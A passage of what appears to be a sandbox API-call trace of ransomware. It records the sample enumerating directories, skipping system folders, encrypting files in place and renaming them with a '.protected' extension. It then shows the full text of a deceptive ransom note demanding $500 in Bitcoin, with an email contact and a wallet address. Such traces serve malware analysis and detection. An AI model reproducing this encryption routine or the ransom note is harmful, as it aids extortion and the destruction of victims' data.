lpString2=".") returned 0 [0060.021] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0060.021] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0060.021] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.021] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.021] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.021] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.021] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.021] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0060.021] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.021] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0060.021] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0060.021] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.021] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.021] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.021] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Program Files") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="Program Files (x86)") returned -1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="$Recycle.bin") returned 1 [0060.022] lstrcmpiW (lpString1="Access.en-us", lpString2="System Volume Information") returned -1 [0060.022] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 79 [0060.022] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0060.022] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0060.022] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned 81 [0060.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0060.065] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.065] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.065] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.") returned 81 [0060.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.066] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\..") returned 82 [0060.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.066] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Windows") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Program Files") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Program Files (x86)") returned -1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="$Recycle.bin") returned 1 [0060.066] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="System Volume Information") returned -1 [0060.066] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.066] StrStrIW (lpFirst="AccessMUI.msi", lpSrch=".protected") returned 0x0 [0060.066] lstrcmpW (lpString1="AccessMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0060.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.066] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".txt") returned 0x0 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".rar") returned 0x0 [0060.215] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0060.215] StrStrW (lpFirst="AccessMUI.msi", lpSrch=".zip") returned 0x0 [0060.216] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.521] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.521] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.540] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.540] CloseHandle (hObject=0x150) returned 1 [0060.540] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.protected") returned 103 [0060.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.protected")) returned 1 [0060.541] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Windows") returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Program Files") returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Program Files (x86)") returned -1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="$Recycle.bin") returned 1 [0060.541] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="System Volume Information") returned -1 [0060.541] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.541] StrStrIW (lpFirst="AccessMUI.xml", lpSrch=".protected") returned 0x0 [0060.541] lstrcmpW (lpString1="AccessMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.541] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".txt") returned 0x0 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".rar") returned 0x0 [0060.550] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0060.550] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".zip") returned 0x0 [0060.550] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x545, lpOverlapped=0x0) returned 1 [0060.561] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x545, lpOverlapped=0x0) returned 1 [0060.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.562] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.562] CloseHandle (hObject=0x150) returned 1 [0060.562] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.protected") returned 103 [0060.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.protected")) returned 1 [0060.563] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Windows") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Program Files") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="Program Files (x86)") returned -1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="$Recycle.bin") returned 1 [0060.563] lstrcmpiW (lpString1="AccLR.cab", lpString2="System Volume Information") returned -1 [0060.563] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.563] StrStrIW (lpFirst="AccLR.cab", lpSrch=".protected") returned 0x0 [0060.563] lstrcmpW (lpString1="AccLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0060.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.563] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".txt") returned 0x0 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".rar") returned 0x0 [0060.573] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0060.573] StrStrW (lpFirst="AccLR.cab", lpSrch=".zip") returned 0x0 [0060.573] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.606] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.606] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.606] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.761] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.761] CloseHandle (hObject=0x150) returned 1 [0060.761] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.protected") returned 99 [0060.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.protected")) returned 1 [0060.762] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files (x86)") returned -1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0060.762] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0060.762] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.762] StrStrIW (lpFirst="branding.xml", lpSrch=".protected") returned 0x0 [0060.762] lstrcmpW (lpString1="branding.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.762] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0060.762] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0060.762] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0060.763] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.763] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0060.764] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.764] StrStrW (lpFirst="branding.xml", lpSrch=".rar") returned 0x0 [0060.764] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0060.764] StrStrW (lpFirst="branding.xml", lpSrch=".zip") returned 0x0 [0060.764] ReadFile (in: hFile=0x150, lpBuffer=0x4aeae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.879] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.879] WriteFile (in: hFile=0x150, lpBuffer=0x4aeae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4aeae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0060.880] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.880] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0060.889] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0060.889] CloseHandle (hObject=0x150) returned 1 [0060.890] wnsprintfW (in: pszDest=0x4aeae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.protected") returned 102 [0060.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.protected")) returned 1 [0060.890] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0060.890] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0060.890] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\RESTORE_FILES.txt") returned 97 [0060.890] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.891] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0060.891] lstrlenA 